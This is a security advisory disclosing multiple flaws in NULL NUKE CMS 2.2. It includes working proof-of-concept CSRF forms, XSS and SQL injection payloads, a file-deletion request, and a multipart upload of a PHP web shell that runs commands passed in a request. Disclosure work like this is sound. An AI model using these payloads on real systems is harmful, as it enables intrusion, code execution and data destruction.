NULL NUKE CMS v2.2 Multiple Vulnerabilities
Vendor: nullwanton
Product web page: http://sourceforge.net/projects/nullnuke/
Affected version: 2.2 and 2.1 rc3
Summary: NULL-8x3-NUKE is a fast, powerful and secure cross platform CMS
for windows and Linux using base or full drive paths.
Desc: NULL NUKE CMS suffers from multiple remote vulnerabilities including
Stored/Reflected XSS, SQL Injection, Arbitrary File Upload, RCE, Arbitrary
File Deletion, Arbitrary File Access using absolute path and/or traversal,
Open Redirection, Parameter Traversal, and Cross-Site Request Forgery.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5185
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5185.php
13.04.2014
---
-------------------------------------
[*] SQL Injection, CSRF (msgid param)
-------------------------------------
http://localhost/nullnuke/msgbox.php?nxt=readmsg&view=1&msgid=7%27
----------------------------------------
[*] Stored XSS, CSRF (faqcattitle param)
----------------------------------------
<html><body>
<form action="http://localhost/nullnuke22/admin.php?fct=faq&nxt=FaqCatAdd" method="POST">
<input type="hidden" name="faqcattitle" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Execute!" />
</form>
</body></html>
-----------------------------------------------------------------------------------------
[*] Arbitrary File Upload at arbitrary location, CSRF, RCE (fupload[1], uploadpath param)
-----------------------------------------------------------------------------------------
POST /nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------117202350024276
Content-Length: 786
-----------------------------117202350024276
Content-Disposition: form-data; name="fupload[1]"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------117202350024276
Content-Disposition: form-data; name="uploadpath"
C:/xampp/htdocs/nullnuke22/
-----------------------------117202350024276
Content-Disposition: form-data; name="_numfeilds"
1
-----------------------------117202350024276
Content-Disposition: form-data; name="uploadform"
Upload
-----------------------------117202350024276
Content-Disposition: form-data; name="unpack_archive"
0
-----------------------------117202350024276
Content-Disposition: form-data; name="addfeild"
1
-----------------------------117202350024276--
--
<html><body>
<form action="http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here" method="POST" enctype="multipart/form-data">
<input type="hidden" name="fupload[1]" value="<?php passthru($_GET['cmd']); ?>" />
<input type="hidden" name="uploadpath" value="C:/xampp/htdocs/nullnuke22/" />
<input type="hidden" name="_numfeilds" value="1" />
<input type="hidden" name="uploadform" value="Upload" />
<input type="hidden" name="unpack_archive" value="0" />
<input type="hidden" name="addfeild" value="1" />
<input type="submit" value="Execute!" />
</form>
</body></html>
---------------------------------------------------
[*] Arbitrary File Deletion, CSRF (dfarray[] param)
---------------------------------------------------
<html><body>
<form action="http://localhost/nullnuke2/admin.php?fct=file_types&nxt=fileSystem" method="POST">
<input type="hidden" name="delfile" value="Delete" />
<input type="hidden" name="dfarray[]" value="C:/secret_secrets.txt" />
<input type="submit" value="Execute!" />
</form>
</body></html>
-------------------------------------------------------------------------------------------
[*] Arbitrary File Read using absolute path, CSRF (file param, value needs to be in base64)
-------------------------------------------------------------------------------------------
http://localhost/nullnuke22/admin.php?fct=file_types&nxt=getfile&path=&file=QzpcdGVzdC50eHQ=
- QzpcdGVzdC50eHQ= (C:\test.txt)
-------------------------------------------
[*] Open Redirect, CSRF (redirectlgn param)
-------------------------------------------
<html><body>
<form action="http://localhost/nullnuke22/login.php?nxt=chklogin" method="POST">
<input type="hidden" name="uname" value="admin" />
<input type="hidden" name="pass" value="admin" />
<input type="hidden" name="remlogin" value="0" />
<input type="hidden" name="redirectlgn" value="http://www.zeroscience.mk" />
<input type="hidden" name="stripit_form" value="uname|pass" />
<input type="hidden" name="mpn_sectype" value="1" />
<input type="submit" value="Execute!" />
</form>
</body></html>
-----------------------------------------------------------------
[*] Reflected XSS, CSRF (upload param, Referer HTTP Header field)
-----------------------------------------------------------------
http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here1f454"><script>alert(1);</script>6747f198ae5
--
GET /nullnuke22/login.php?nxt=chklogin&uname=admin&pass=admin&remlogin=0&redirectlgn=http%3A%2F%2Flocalhost%2Fnullnuke22%2Fadmin.php%3Ffct%3Dfile_types%26nxt%3DfileSystem%26upload%3Dhere&stripit_form=uname%7Cpass&mpn_sectype=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=b55ec"><script>alert(document.cookie);</script>bb8d1b11bd9304d5f
Connection: keep-alive